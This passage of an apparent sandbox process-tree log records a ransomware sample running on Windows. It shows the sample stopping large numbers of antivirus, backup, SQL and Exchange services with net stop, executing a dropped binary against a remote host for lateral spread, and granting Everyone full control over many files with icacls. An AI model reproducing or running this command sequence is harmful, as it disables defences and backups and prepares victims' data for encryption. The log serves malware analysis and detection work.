    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:17368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:8520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:15296
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:8512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:17376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:8500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:5084
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:8492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
    3⤵
    PID:16456
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:8480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:5640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:8472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:5672
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:8464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
    3⤵
    PID:6072
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:8456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Symantec System Recovery” /y
    3⤵
    PID:16504
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:8448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:16352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:8440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
    3⤵
    PID:17336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:7540
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:7532
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:7524
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:7516
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:7508
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:7492
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:7484
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:7476
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:7468
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:7460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:7452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:7440
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:7432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:7424
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:7416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:7400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:7392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:7384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:7368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:7360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:7344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:7336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:7328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:7312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:7304
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:7288
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:7280
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:7264
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:7256
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:7248
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:7232
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:7224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:7208
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:7200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:7184
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:7176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:6344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:4380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:6336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:3904
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:4764
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:3812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:6156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:5664
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:5912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:7156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:7148
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:7132
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:7124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:7108
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:7100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:7092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:7084
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:7076
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:7068
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:7060
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:7052
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:7044
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:7036
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:7028
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:7020
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:7012
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:7004
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:6996
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:6988
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:6980
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:6972
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:6964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:6956
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:6948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:6940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:6932
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:6924
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:6916
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:6908
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:6900
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:6892
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:6884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:6876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:6868
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:6860
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:6852
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:6844
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.29
  2⤵
  PID:6004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5784
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:6836
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:6828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:6820
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:6812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:6796
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:6788
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:6780
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:6772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:6764
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:6756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:6748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:6740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:6732
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:6720
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:6712
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:6704
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:6696
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:6688
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:6680
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:6672
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:6664
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:6656
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:6648
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:6640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:6632
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:6624
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:6616
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:6608
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:6600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:6592
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:6192
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:6184
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:6176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:6168
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:6160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5968
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:4520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:2004
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:6060
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:5876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:4136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:5600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5944
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:4072
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:5856
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:5228
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:5292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:5744
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:5800
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5116
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5204
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:6112
- C:\Users\Admin\AppData\Local\Temp\yrbyuioh.exe
  "C:\Users\Admin\AppData\Local\Temp\yrbyuioh.exe" \\10.10.0.29 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe"
  2⤵
  - Executes dropped EXE
  PID:15088
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:12240
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.25
  2⤵
  PID:12016
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.29
  2⤵
  PID:12096
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7DCC.bat
  2⤵
  PID:13052
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat /grant Everyone:F /T /C /Q
  2⤵
  PID:14548
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
  2⤵
  PID:16992
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
  2⤵
  PID:16996
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:13920
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6444
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:4148
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6992
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:9472
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:9672
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:9624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:9036
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:7588
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:5520
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:13388
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9332
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:7368
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13856
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:12868
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:13476
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:9372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:13552
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q
  2⤵
  PID:14544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant Everyone:F /T /C /Q
  2⤵
  PID:14528
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10282020-181633-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:14892
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10282020-181801-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:6176
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10282020-182044-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:14836
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10282020-182302-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:5716
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:10476
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:17080
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:14596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:7420
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:13576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:7072
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7452
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-10282020-181632.log /grant Everyone:F /T /C /Q
  2⤵
  PID:17308
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-10282020-181632.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6884
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-10282020-181632-00000003-ffffffff.bin /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9056
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-3079DA66429056320DED3D5E871998ECC0E04BFB.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:6732
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-3079DA66429056320DED3D5E871998ECC0E04BFB.bin.80 /grant Everyone:F /T /C /Q
  2⤵
  PID:9856
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-3079DA66429056320DED3D5E871998ECC0E04BFB.bin.83 /grant Everyone:F /T /C /Q
  2⤵
  PID:8216
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-3079DA66429056320DED3D5E871998ECC0E04BFB.bin.A0 /grant Everyone:F /T /C /Q
  2⤵
  PID:9204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\MpDiag.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:7884
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\22\109003 /grant Everyone:F /T /C /Q
  2⤵
  PID:7928
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\21\260 /grant Everyone:F /T /C /Q
  2⤵
  PID:5296
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\328 /grant Everyone:F /T /C /Q
  2⤵
  PID:9356
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\272 /grant Everyone:F /T /C /Q
  2⤵
  PID:7336
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107001 /grant Everyone:F /T /C /Q
  2⤵
  PID:9364
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\109002 /grant Everyone:F /T /C /Q
  2⤵
  PID:14572
- C:\Windows\SYSTEM32\icacls.exe
